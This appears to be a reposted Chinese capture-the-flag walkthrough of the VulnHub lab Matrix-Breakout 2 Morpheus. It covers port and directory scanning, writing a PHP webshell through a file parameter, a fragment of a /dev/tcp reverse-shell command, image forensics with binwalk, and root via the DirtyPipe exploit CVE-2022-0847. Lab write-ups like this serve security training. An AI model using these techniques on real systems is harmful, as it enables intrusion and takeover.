返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >vulnhub靶场Matrix-Breakout 2 Morpheus教程
  • 847
分享到

vulnhub靶场Matrix-Breakout 2 Morpheus教程

网络安全安全系统安全web安全Poweredby金山文档 2023-10-28 07:10:15 847人浏览 八月长安
摘要

靶场搭建 靶机下载地址:Matrix-Breakout: 2 Morpheus ~ VulnHub 直接解压双击ova文件即可 使用软件:VMware(可能会出现问题),VirtualBox(此处官方建议使用VirtualBox)

    • 靶场搭建

靶机下载地址:Matrix-Breakout: 2 Morpheus ~ VulnHub

直接解压双击ova文件即可

使用软件:VMware(可能会出现问题),VirtualBox(此处官方建议使用VirtualBox)

难度:中等

攻击机:kali

    • 信息收集

为了方便我直接使用windows上的lansee直接扫描出目标靶机ip

lansee扫描结果

去除已知靶机ip剩下的就是目标靶机

192.168.21.134

当然需要访问看看

访问结果

看看源码能出现啥

192.168.21.134网页主页源码

没有什么有用的看看nmap能看出来啥

nmap 192.168.21.143

nmap简单扫描结果

看看端口详细信息

nmap -A -T4 -p- 192.168.21.143

nmap扫描到的详细信息

这也没有看到什么有用的信息,端口都想需要登入。

此处只能进行文件爆破了,看看能不能扫出来啥

ffuf -u Http://192.168.21.143/FUZZ -w /usr/share/dirbuster/Wordlists/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.PHP,html
查找该网站下的txt,zip,php,html文件

ffuf扫描结果

于是我们看到这几个文件:

robots.txtgraffiti.txtgraffiti.php

这些肯定都要去看看

graffiti.txt和graffiti.php访问结果

此处试试看输入会发生什么

发现此处输入的内容会保存在txt文件中,先抓个包看看变量名是啥

burp抓包结果

此处有一个file变量,那么改变file变量可以直接对靶机文件修改,升值能随意创建文件

二话不说写个马,准备反弹shell

burp发送包

访问试试,看看成功创建了没

shell访问结果

白屏就是访问成功了,此处使用WEBshell管理工具就能直接链接

为了方便就直接用蚁剑直接拦截

蚁剑链接结果

看到文件

蚁剑的文件不是完整的,可能会有隐藏文件,此处简单一点直接在反弹shell双管齐下(一句话魔改一下)(记得要弄url编码)(干掉问号和空格和&)

& /dev/tcp/192.168.21.143/666 0>&1'"); ?>

文件发包

访问文件即可即可反弹shell

反弹shell结果

轻松拿到提示

flag一般会在home里,先去看看也没事

ls -al /home
建议使用-al可以直接看到所有文件

此处只能访问唯独一个的文件夹了,看看里面有啥

根本没啥用,去原来的目录看看

去到我进来写的shell看到一个图片看看,直接访问,毕竟没有扫出来

http://192.168.21.143/.cypher-neo.png

图片访问结果

问题就是它了,网站上看不出来问题下载下看看

wget http://192.168.21.143/.cypher-neo.pngbinwalk .cypher-neo.peng.1

!!!!捆绑好家伙行

binwalk -e .cypher-neo.png.1 --run-as=root

进去看看有啥

查看文件,此处脑子烧了zlib之后再写吧


zlib分析文章

https://blog.csdn.net/qq_40574571/article/details/80164981
https://www.cnblogs.com/ainsliaea/p/15780903.html

剩下来的就是提权了

系统是linux4.x|5.x看看有没有漏洞能利用,直接发现有漏洞能直接用CVE-2022-0847

https://gitcode.net/mirrors/r1is/CVE-2022-0847

下载下去直接传上去跑就行(蚁剑直接传上去就可以了)(或者使用shell直接吓到靶机里)

给权限直接跑

chmod +x dirty.sh

这里要记得回复原来的密码能直接变更权限

拿到root权限和flag靶机结束

来源地址:https://blog.csdn.net/m0_73248913/article/details/128748809

--结束END--

本文标题: vulnhub靶场Matrix-Breakout 2 Morpheus教程

本文链接: https://lsjlt.com/news/516649.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作